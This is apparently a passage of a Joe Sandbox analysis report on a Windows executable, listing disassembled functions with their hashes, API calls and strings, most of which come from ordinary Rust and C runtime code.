                                            • Instruction Fuzzy Hash: 2132F262B0879785FB11AE2984106F8B771AB37798FD44232EF6E22789DF78D545C320
                                            Function 00007FF7B9011810 Relevance: .6, Instructions: 626COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 221ed2624c55a2e28807d3ce3963ad646ab2a21044d519d964c442750a414cd7
                                            • Instruction ID: 1640184f9877eb15c8ac91cd803924be67ca3941a50e1ddb8499b35c8fd55859
                                            • Opcode Fuzzy Hash: 221ed2624c55a2e28807d3ce3963ad646ab2a21044d519d964c442750a414cd7
                                            • Instruction Fuzzy Hash: 22322A22A1C6A385EA65AE2C90007B9E771EB777D4FC48631EBAD13799EF2CD145C310
                                            Function 00007FF7B9027130 Relevance: .5, Instructions: 500COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorHandleLast
                                            • String ID:
                                            • API String ID: 2586478127-0
                                            • Opcode ID: b34943c36c60378abf8c1f298144ab8f735b3069bf5e9b792ee67a0488236842
                                            • Instruction ID: 78768be32a783094b98be9e655f30bbc4f462cfc0a2c4726f673feda6e74870c
                                            • Opcode Fuzzy Hash: b34943c36c60378abf8c1f298144ab8f735b3069bf5e9b792ee67a0488236842
                                            • Instruction Fuzzy Hash: C302DF62F1965796FA04AF2998043F9B6B0AF26788F908534DF2D53798DF3CF5818710
                                            Function 00007FF7B90423B0 Relevance: .5, Instructions: 499COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 85e6ecfb64c365217a0db7b32e2770df33e9e3503e4a9046a8bbb8d6648499f7
                                            • Instruction ID: 19f9d8525db1b155ba545b99434331025680c407d3fe8d8a9ea7088141b8d666
                                            • Opcode Fuzzy Hash: 85e6ecfb64c365217a0db7b32e2770df33e9e3503e4a9046a8bbb8d6648499f7
                                            • Instruction Fuzzy Hash: 64120952F18BE346F7526F3C58422B9D770AB6B3D4F445334EFA852A9ACF28D6418260
                                            Function 00007FF7B9046080 Relevance: .4, Instructions: 365COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b83194662346546361f741b4b979d63a3320962cad3683241e97a7940b826e0
                                            • Instruction ID: 57bd5b3b1a5a9f23d7cae7276eb9b54b1e0b6c271d8927f723ddcb16872f2e3a
                                            • Opcode Fuzzy Hash: 9b83194662346546361f741b4b979d63a3320962cad3683241e97a7940b826e0
                                            • Instruction Fuzzy Hash: 36C15A22B1C6E652FA15DF299914BB9A671B722B94FC08130DF2E43BC8EF3CE5519310
                                            Function 00007FF7B9039AF0 Relevance: .4, Instructions: 351COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa981abc52c7698188d00a9c32d1fcc652a5a437a41808e292dde5593fa20b64
                                            • Instruction ID: 6bbc5d89701e76386ca0ca3df20d6a171952c495ea2af09ebd64a99314aaf1c0
                                            • Opcode Fuzzy Hash: aa981abc52c7698188d00a9c32d1fcc652a5a437a41808e292dde5593fa20b64
                                            • Instruction Fuzzy Hash: 3BC13692D1C293C4FB619E6C96417BAFAA1D72B764FD44230CB7D171DACA3CD9928320
                                            Function 00007FF7B9045A90 Relevance: .3, Instructions: 337COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b35546d95137ae1cd189ec2b2a78a858d589c4872b4ecaf7bc022615416439d
                                            • Instruction ID: 566a4a1eb45f6960a65b081e57b9c99bed9d6cef00b44cc20c5aa73c088b7429
                                            • Opcode Fuzzy Hash: 9b35546d95137ae1cd189ec2b2a78a858d589c4872b4ecaf7bc022615416439d
                                            • Instruction Fuzzy Hash: 1CC1AD92E3DBA711F6235B3D54016B489305F737A0A81D336FE7E31BE5EB29E6429210
                                            Function 00007FF7B902E060 Relevance: .3, Instructions: 334COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e7b30ffdeeab9917f631e5aa7c20e436b95b569e0a40d79cca50245ddd54367
                                            • Instruction ID: 11aad84f1c57167ffdc51058d20d482961adb8245e7e2e056dd857348abf5a5a
                                            • Opcode Fuzzy Hash: 9e7b30ffdeeab9917f631e5aa7c20e436b95b569e0a40d79cca50245ddd54367
                                            • Instruction Fuzzy Hash: 85C10462A58A4342EB259E2995002BEFEB1BF32788F945531DF7F067D8DE3CE5419220
                                            Function 00007FF7B9042C20 Relevance: .3, Instructions: 330COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37b4546647432975a8fffa9094ad510d30eedb15b9c04380023069877228475d
                                            • Instruction ID: 817a5c3b7707585c6f7c8d2dc256cfe92d18ad6044ffd1475f770c804a2e707e
                                            • Opcode Fuzzy Hash: 37b4546647432975a8fffa9094ad510d30eedb15b9c04380023069877228475d
                                            • Instruction Fuzzy Hash: A9D1B752F14FE646F3526B3C58032B9A334BFAB7D4F406334EFE455A5ADB7892428250
                                            Function 00007FF7B9049318 Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4be44de7018001e7f1b066c3ac6d0d446ad464c09974f8235d1753243f23d6b6
                                            • Instruction ID: c6db66cca0b86abc5c7917a5c391b675799fb9fa3f7a40c86691dc745d270b9a
                                            • Opcode Fuzzy Hash: 4be44de7018001e7f1b066c3ac6d0d446ad464c09974f8235d1753243f23d6b6
                                            • Instruction Fuzzy Hash: BFA00121908903A4E605AF18A8A0064A234AB67B11BC00471D22D815A99E3CE4409625
                                            Function 00007FF7B904A73C Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwindterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStateabortstd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 9366333-393685449
                                            • Opcode ID: c0dbc96ef5fb765a35e6a1437dba457f804b00cf968a936fcde4d1b713db04b2
                                            • Instruction ID: 7bb3541288e545a3ab53056cd079f9818483a225c5efbaa3285bd7030ac4d2d9
                                            • Opcode Fuzzy Hash: c0dbc96ef5fb765a35e6a1437dba457f804b00cf968a936fcde4d1b713db04b2
                                            • Instruction Fuzzy Hash: DAD1A1329087428AEB20AF6A94403ADB7B5FB66788F910135DFAD4775ACF3CE491C750
                                            Function 00007FF7B903B060 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 220libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B098
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B0D0
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B10A
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B170
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B1A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressProc$CurrentProcess
                                            • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace
                                            • API String ID: 2190909847-3384281969
                                            • Opcode ID: 5573b4725ce5cc75251cd0737fc1eca949bec2c587926e98fe881261ec675c98
                                            • Instruction ID: 4bd10fdbb4cce0a31e8f79970f7b8fea14405e049ffe064540c65829ceb0b51d
                                            • Opcode Fuzzy Hash: 5573b4725ce5cc75251cd0737fc1eca949bec2c587926e98fe881261ec675c98
                                            • Instruction Fuzzy Hash: 53B18031A08AC299E7319F29A9417F9A3B4FF29798F844135EB5C4B75CDF78D2819310
                                            Function 00007FF7B9039F80 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 422COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FullNamePath
                                            • String ID: \\?\$\\?\UNC\
                                            • API String ID: 2482867836-3019864461
                                            • Opcode ID: 7a42f174e2cde6acd6d9ef7840f7b3689833c545df9eac48ea652f30d82ecd85
                                            • Instruction ID: 17b7aee3069e19d1654dd42103498c6f3ee27d428d3755ead031e51f77e4cbf4
                                            • Opcode Fuzzy Hash: 7a42f174e2cde6acd6d9ef7840f7b3689833c545df9eac48ea652f30d82ecd85
                                            • Instruction Fuzzy Hash: 9C02A462A0C69385EB70AF19D6447B8B3B4FB2AB94F818136DB6C57688DF3CD5819310
                                            Function 00007FF7B9036B6E Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Handle$CloseErrorLast$CreateCurrentDuplicateProcessThread
                                            • String ID: RUST_MIN_STACK$failed to spawn thread
                                            • API String ID: 4152547513-917136298
                                            • Opcode ID: b9022e5d87f67925ce0ea4183ce08df445dda906ad3cb8caf0b04fd543611c86
                                            • Instruction ID: 49591924bffad21ed92d7110f2d6c57c7f6375607df0fba12e031546ae31402e
                                            • Opcode Fuzzy Hash: b9022e5d87f67925ce0ea4183ce08df445dda906ad3cb8caf0b04fd543611c86
                                            • Instruction Fuzzy Hash: 21D14122A08B8389E711AF68D9403A977B1FB6A758F904135EB5D47B9DDF38E484C360
                                            Function 00007FF7B902ABA0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • stack backtrace:, xrefs: 00007FF7B902AC49
                                            • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF7B902AF85
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookup
                                            • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                            • API String ID: 2800785878-3192684347
                                            • Opcode ID: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                            • Instruction ID: cc12666b93f7250940979922533f38d42e843b6c42fa28edba59bb9130ae6c3d
                                            • Opcode Fuzzy Hash: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                            • Instruction Fuzzy Hash: A6B10862604FC198EB719F28DC403EA77A4FB16799F840129DB5C4BB99EF38D245DB10
                                            Function 00007FF7B9030D20 Relevance: 10.7, APIs: 7, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseCreateErrorEventHandleLastMultipleObjectsOverlappedResultWait
                                            • String ID:
                                            • API String ID: 1266231692-0
                                            • Opcode ID: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
                                            • Instruction ID: e2587a00af077cb21df443a8cd5ea5728c8fc4eb3f9d9814a27bf841309473ad
                                            • Opcode Fuzzy Hash: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
                                            • Instruction Fuzzy Hash: 1C816B22E09B9689EB109F69D9403AD7370FB2A798F404631EF2C57B8DDF78D4518360
                                            Function 00007FF7B902B3C0 Relevance: 10.6, APIs: 7, Instructions: 148fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$FileSleep$ErrorLastReadWrite
                                            • String ID:
                                            • API String ID: 4082512061-0
                                            • Opcode ID: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                            • Instruction ID: 528094167b655d22be42765f9172fc07b6076cc957c83ab2f2a886185c094d27
                                            • Opcode Fuzzy Hash: 0d8f85834ed94a0328527500f3fbf17a6b9c570b74d9ee048fd7e452b0836797
                                            • Instruction Fuzzy Hash: 47518222604AD395E731AF29A8017F973B4FB56398F844235EE6C4AB9CDE78D285D310
                                            Function 00007FF7B904BA3C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BAC1
                                            • GetLastError.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BACF
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BAF9
                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BB67
                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B904BCEE,?,?,?,00007FF7B904B9E0,?,?,?,00007FF7B9049F79), ref: 00007FF7B904BB73
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                            • Instruction ID: 300edeb5fb4833b6bddef57a234ead7fd454d5d849b9d894dc8367211c017cae
                                            • Opcode Fuzzy Hash: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                            • Instruction Fuzzy Hash: 6231C72171A64391EE51AF1A944057DA3B4BF67BA0F890534EE7D4735CEE7CE4408660
                                            Function 00007FF7B9037A00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 197COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Handle$CloseConsoleErrorLastMode
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 1170577072-2333694755
                                            • Opcode ID: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                            • Instruction ID: 9446b8d200e3e6d7c7ddfa4101c96b831f3a05375c91a7c3778022154c6fa201
                                            • Opcode Fuzzy Hash: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                            • Instruction Fuzzy Hash: 4D81B462A1868395FB11AF78A9403FCA771AB2A798F804135DF6D1369DDF3CD1858360
                                            Function 00007FF7B904AC0C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslatorabort
                                            • String ID: MOC$RCC
                                            • API String ID: 292945357-2084237596
                                            • Opcode ID: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                            • Instruction ID: b9e30c2bca7c246e99a56e6f3ef893e292623bbf8301bf06080033df43295eca
